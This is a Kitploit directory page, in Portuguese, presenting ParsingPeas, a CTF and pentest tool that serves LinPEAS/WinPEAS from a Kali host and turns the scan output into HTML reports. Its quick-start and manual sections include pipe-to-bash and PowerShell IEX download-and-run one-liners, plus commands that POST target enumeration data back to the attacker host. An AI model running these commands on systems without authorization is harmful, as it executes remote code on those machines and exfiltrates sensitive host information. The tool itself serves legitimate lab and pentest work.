Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ParsingPeas — Analisador HTML para saída do PEAS com funcionalidades adicionais | Kitploit
Ferramentas/GitHubGitHub/yuvalmil/parsingpeas
Escalada de PrivilégiosScripting e AutomaçãoColeta de InformaçõesPós-ExploraçãoCTFTestes de PenetraçãoUtilitários e FrameworksAprendizado e EducaçãoLabs e Prática
GitHubyuvalmil/parsingpeas

ParsingPeas

Analisador HTML para saída do PEAS com funcionalidades adicionais

15914há 1 mêsRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

ParsingPeas 🥒

Coleta automatizada do PEASS + um relatório HTML limpo e portátil para trabalhos de escalonamento de privilégios em CTF e laboratórios.

License: MIT Python 3.8+

Execute um comando no alvo. O ParsingPeas obtém o LinPEAS/WinPEAS do seu host Kali, executa a varredura, envia a saída de volta e a transforma em um único relatório HTML autossuficiente que você pode ler, pesquisar, classificar e guardar — sem transferência manual de arquivos, sem internet no alvo.


Capturas de tela

Resumo do relatório — seções agrupadas pelas próprias categorias do LinPEAS, com pontos de descoberta e uma barra de descobertas:

Resumo do relatório

Apenas descobertas — um clique filtra o relatório e a barra lateral para exibir apenas as seções com resultados críticos/altos:

Apenas descobertas

Saída completa do terminal — a varredura completa e fielmente colorida; pesquisável com Ctrl-F:

Saída completa do terminal


Por quê?

A saída bruta do PEASS é uma parede de texto de terminal rolante que desaparece no momento em que seu shell morre. O ParsingPeas:

  • Automatiza o trabalho braçal — sem scp, sem hospedar o linpeas você mesmo, sem copiar e colar a saída de volta para o Kali.
  • Salva tudo — cada varredura se torna um relatório HTML com timestamp no seu host.
  • Torna navegável — a saída é dividida nas seções reais do LinPEAS com uma barra lateral categorizada, destaques de descobertas e pesquisa de texto completo.
  • Viaja bem — cada relatório é um único arquivo .html autossuficiente que você pode copiar da máquina, arquivar ou abrir offline com um duplo clique.

É apresentação + logística, não um motor de exploração: ele preserva fielmente a própria coloração e descobertas do PEASS, sem tentar reinterpretá-las.


Funcionalidades

  • Fluxo de trabalho em uma linha — o alvo baixa o wrapper do seu host, executa o PEASS e envia o resultado de volta automaticamente via POST.
  • Funciona offline no alvo — tudo é servido a partir do seu host Kali.
  • Análise fiel das seções — segue a hierarquia real de cabeçalhos de dois níveis do LinPEAS (seções principais + subverificações); os links do hacktricks e linhas de verificação permanecem como conteúdo, sem poluir o sumário.
  • Relatórios autossuficientes — a saída do terminal é incorporada inline; um arquivo, sem arquivos auxiliares, abre via file://.
  • Visualização interativa do relatório:
    • Índice na barra lateral agrupado pelas próprias seções do PEASS, com contagens de críticos/altos.
    • Barra de descobertas — chips N crítico / N alto que saltam entre as seções sinalizadas, além de uma legenda de cores.
    • Filtro "apenas descobertas" para triagem rápida.
    • Alternância de quebra de linha (ativada por padrão — sem mais linhas truncadas).
    • Scrollspy — seção atual destacada no índice enquanto você rola.
    • Cabeçalhos de seção fixos e pontos "marcar como lido" que persistem (localStorage, por relatório).
    • Badges de cabeçalho para o usuário atual (vermelho se for root) e SO.
  • Aba de saída completa do terminal — a varredura completa e totalmente colorida, renderizada de uma só vez para que o Ctrl-F do navegador pesquise tudo.
  • Tema escuro suave — fácil para os olhos em sessões longas.
  • Linux e Windows — LinPEAS (bash) e WinPEAS (PowerShell).

Início rápido

No seu host Kali

root@kitploit:~
git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh                      # baixa LinPEAS + WinPEAS para scripts/
pip3 install -r requirements.txt
python3 receiver.py             # serve em http://0.0.0.0:8005

Mantenha receiver.py em execução. Descubra o IP pelo qual o alvo o alcançará:

  • HTB / VPN: seu endereço tun0 — ip -4 addr show tun0
  • LAN: o IP da sua interface normal

No alvo

Linux/Unix (usa curl, com fallback para wget):

root@kitploit:~
curl -sSL http://YOUR_KALI_IP:8005/get-script | bash

Windows (PowerShell / shell reverso):

root@kitploit:~
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8005/get-script.ps1')"

Escolha a linha única que corresponde ao SO do alvo — Linux serve LinPEAS, Windows serve WinPEAS.

Visualizar o relatório

Os relatórios são gerados no seu host Kali em ./reports/. Você pode:

  • Navegar pelo índice em http://YOUR_KALI_IP:8005 e clicar em um relatório, ou
  • Abrir o arquivo gerado diretamente — ele é autossuficiente:
    root@kitploit:~
    xdg-open ./reports/report_<host>_<timestamp>.html
    

Copie esse único .html para qualquer lugar; ele funciona sozinho.


Como funciona

root@kitploit:~
Alvo → baixa o wrapper do Kali → executa o PEASS → envia a saída via POST → Kali analisa → relatório HTML autossuficiente

O alvo nunca precisa de internet — o wrapper e os binários do PEASS são todos servidos a partir do seu host.


Usando o relatório

  • Aba Resumo do Relatório — seções agrupadas por categoria do PEASS na barra lateral. Pontos vermelhos/amarelos marcam seções com descobertas críticas/altas. Use os chips de Descobertas para pular diretamente para elas, ou Apenas descobertas para ocultar todo o resto.
  • Aba Saída Completa do Terminal — a varredura colorida completa. Apenas pressione Ctrl-F para pesquisar; toda a saída é renderizada, então a busca nativa abrange tudo.
  • Clique em um ponto de descoberta para marcar uma seção como lida — ela permanece lida quando você reabrir o relatório.

Uso manual

Se a linha única falhar, faça manualmente.

Linux:

root@kitploit:~
# No alvo
curl http://KALI_IP:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# Enviar de volta
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
  --data-binary @/tmp/out.txt http://KALI_IP:8005/upload

Windows (PowerShell):

root@kitploit:~
Invoke-WebRequest -Uri http://KALI_IP:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://KALI_IP:8005/upload -Method POST `
  -Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
  -InFile $env:TEMP\out.txt

Analisar um dump do PEASS que você já possui:

root@kitploit:~
python3 parser.py /caminho/para/saida_peas.txt   # gera um relatório HTML em ./reports/

Configuração

Edite o início de receiver.py:


Solução de problemas

  • Não consegue baixar o script? Execute curl http://KALI_IP:8005/health para verificar a conectividade; abra o firewall com sudo ufw allow 8005/tcp.
  • 404 em /get-linpeas? Execute ./setup.sh para baixar os binários do PEASS.
  • Sem saída ao vivo em um shell reverso do PowerShell? Esperado — a varredura ainda é executada; observe seu receiver pela confirmação de upload.

Segurança

⚠️ Apenas para testes de penetração autorizados, CTFs e uso em laboratório.

  • Sem autenticação — execute apenas em redes isoladas/CTF, atrás de um firewall.
  • Os valores dos cabeçalhos de upload são sanitizados e os uploads têm limite de tamanho, mas o servidor não é reforçado para exposição hostil à internet.

Créditos

Construído sobre PEASS-ng por @carlospolop. O ParsingPeas apenas coleta e apresenta sua saída.


Licença MIT · Contribuições são bem-vindas

Baixar ferramenta
ConfiguraçãoPadrãoObservações
Porta8005altere a linha app.run(... port=...)
OUTPUT_DIR./received_outputsvarreduras brutas enviadas
REPORTS_DIR./reportsrelatórios HTML gerados
SCRIPTS_DIR./scriptsbinários LinPEAS/WinPEAS
MAX_UPLOAD_SIZE10 MBimposto — uploads maiores recebem HTTP 413